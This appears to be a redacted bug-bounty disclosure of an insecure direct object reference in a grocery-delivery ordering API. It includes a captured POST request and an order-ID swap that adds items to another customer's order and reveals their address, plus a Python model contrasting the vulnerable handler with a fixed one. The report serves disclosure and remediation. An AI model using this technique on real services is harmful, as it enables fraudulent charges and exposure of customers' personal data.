The [██████) website allows users to place orders and modify them after they have been placed.
An order can only be modified while it is still in the state before shopping begins; this lets customers adjust an order before its final shipment.
It is possible to add arbitrary products to another user's order after it has been placed but before shopping begins. The same HTTP request also discloses the content of the target order, including the victim user's physical address.
For this Proof-of-Concept, the technical values were the following:

| Key | Value |
|---|---|
| Attacker e-mail | ██████ |
| Victim e-mail | ███ |
| Attacker order ID | 1813918441 |
| Victim order ID | 181396149 |

For the sake of simplicity, the address was set to ███████ and the shop was CVS (`"store":{"store_id":60,"store_location_id":29244,"metro_id":210,"name":"CVS"}`).
Once both orders are placed, capture the request that adds a product to the attacker's own order (step two):
```http
POST /aviator/v2/orders/1813918441/add.json?anonymous_id███deac090c-2b05-4402-b33f-468060058145█████white_label_key████████shipt████████segway_version██████6668a3d631495cebf307423e23a588c5f9d929c1████zip█████████████user_id█████████████████████████metro_id█████████124███████store_id████████60██████bucket_number██████72███store_location_id██████████platform████████web HTTP/2
Host: ███████
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/███████ Firefox/110.0
Accept: application/json, text/plain, */*
Accept-Language: fr,fr-FR;q████████0.8,en-US;q█████0.5,en;q████████0.3
Accept-Encoding: gzip, deflate
Content-Type: application/json
Content-Length: 154
Referer: ██████
Origin: █████████
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-site
X-Pwnfox-Color: blue
Authorization: ██████████
Te: trailers

{"zip":"████","user_id":█████,"metro_id":124,"store_id":60,"bucket_number":72,"store_location_id":██████,"products":[{"id":4799771,"qty":1,"note":""}]}
```
To perform the exploit, simply replace the order number in the URL path with the victim's order number: here, 1813918441 becomes 181396149. The server does not check that the authenticated user owns the order identified in the path.
The server then adds the selected products to the victim's order and additionally discloses the content of the order together with the customer's e-mail address:
████████
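As an added example (not code from the original report), the following Python models the order-modification endpoint in memory and contrasts a handler with the missing ownership check, which reproduces both the cart manipulation and the data disclosure described above, with a hardened handler that binds the order to the authenticated session. The user IDs, e-mail addresses, physical addresses and the `attempt`/`handle_add_request` helpers are constructed for illustration; only the two order IDs and the product ID come from the report.

```python
# Added example, not from the original report: a minimal model of the
# order-modification endpoint, contrasting the missing ownership check that
# produces the IDOR with a hardened handler. Names, user IDs, e-mails and
# addresses below are constructed; only the order IDs and product ID are taken
# from the report.
import json
from dataclasses import dataclass, field


class AuthorizationError(Exception):
    pass


class OrderStateError(Exception):
    pass


@dataclass
class Order:
    order_id: int
    owner_user_id: int
    email: str
    address: str
    status: str = "placed"          # "placed" -> "shopping" -> "delivered"
    products: list = field(default_factory=list)


def make_orders():
    """Fresh in-memory order store holding the attacker's and victim's orders."""
    return {
        1813918441: Order(1813918441, 1001, "attacker@example.test", "1 Attacker St"),
        181396149: Order(181396149, 2002, "victim@example.test", "2 Victim Ave"),
    }


def _apply(order, products):
    # The state check the site does perform: only not-yet-shopped orders change.
    if order.status != "placed":
        raise OrderStateError(f"order {order.order_id} is already {order.status}")
    order.products.extend(products)
    # Echoing the whole order back is what turns the IDOR into a data disclosure.
    return {"order_id": order.order_id, "email": order.email,
            "address": order.address, "products": list(order.products)}


def add_products_vulnerable(orders, order_id, caller_user_id, products):
    """Vulnerable: trusts the order ID from the URL path and never compares the
    order's owner with the authenticated caller."""
    order = orders[order_id]
    return _apply(order, products)


def add_products_fixed(orders, order_id, caller_user_id, products):
    """Hardened: the order must belong to the authenticated caller. Missing and
    foreign orders get the same error so the endpoint cannot be used to probe
    which order IDs exist or what state they are in."""
    order = orders.get(order_id)
    if order is None or order.owner_user_id != caller_user_id:
        raise AuthorizationError("order not found")
    return _apply(order, products)


def handle_add_request(orders, session_user_id, path_order_id, body_json, handler):
    """Model of POST /aviator/v2/orders/<id>/add.json. The identity comes from
    the session, the order ID from the path; the user_id in the body is ignored
    because the client controls it."""
    body = json.loads(body_json)
    return handler(orders, path_order_id, session_user_id, body["products"])


def attempt(orders, session_user_id, path_order_id, body_json, handler):
    """Run a request and return either the response dict or the name of the
    error it raised, so outcomes can be compared without exception handling."""
    try:
        return handle_add_request(orders, session_user_id, path_order_id, body_json, handler)
    except (AuthorizationError, OrderStateError) as exc:
        return type(exc).__name__


# Body from the report, with the redacted fields replaced by placeholders.
ATTACK_BODY = json.dumps({"zip": "00000", "user_id": 1001, "metro_id": 124,
                          "store_id": 60, "bucket_number": 72,
                          "store_location_id": 0,
                          "products": [{"id": 4799771, "qty": 1, "note": ""}]})

if __name__ == "__main__":
    # Attacker (user 1001) puts the victim's order ID in the path.
    print("vulnerable:", attempt(make_orders(), 1001, 181396149, ATTACK_BODY, add_products_vulnerable))
    print("fixed:     ", attempt(make_orders(), 1001, 181396149, ATTACK_BODY, add_products_fixed))
    print("owner:     ", attempt(make_orders(), 2002, 181396149, ATTACK_BODY, add_products_fixed))
```

Two points of the fix matter in practice: the ownership check keys off the session identity, not the `user_id` field the client sends in the body, and an order that exists but belongs to someone else returns the same "not found" error as a non-existent one, which also closes the order-status probing noted below.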
Additionally, by targeting other order numbers, it is possible to disclose the status of those orders. For example:
The vulnerability described here has significant impact on both customers and the company, since it allows manipulation of orders and exposes sensitive customer information.
The exploit both discloses the user's physical address and has them billed for unwanted items.
The business impact can go well beyond this. Customers who fall victim to the attack are billed for items they never chose, a direct financial loss for them, and the company may then have to issue refunds or compensation, a financial loss for the company. Operationally, it could also disrupt the smooth running of deliveries.
From a reputational perspective, affected customers may lose trust in the company's ability to protect their personal and financial information, which could result in negative reviews, decreased sales and a damaged reputation.
Disclosure of the physical address also raises personal safety concerns.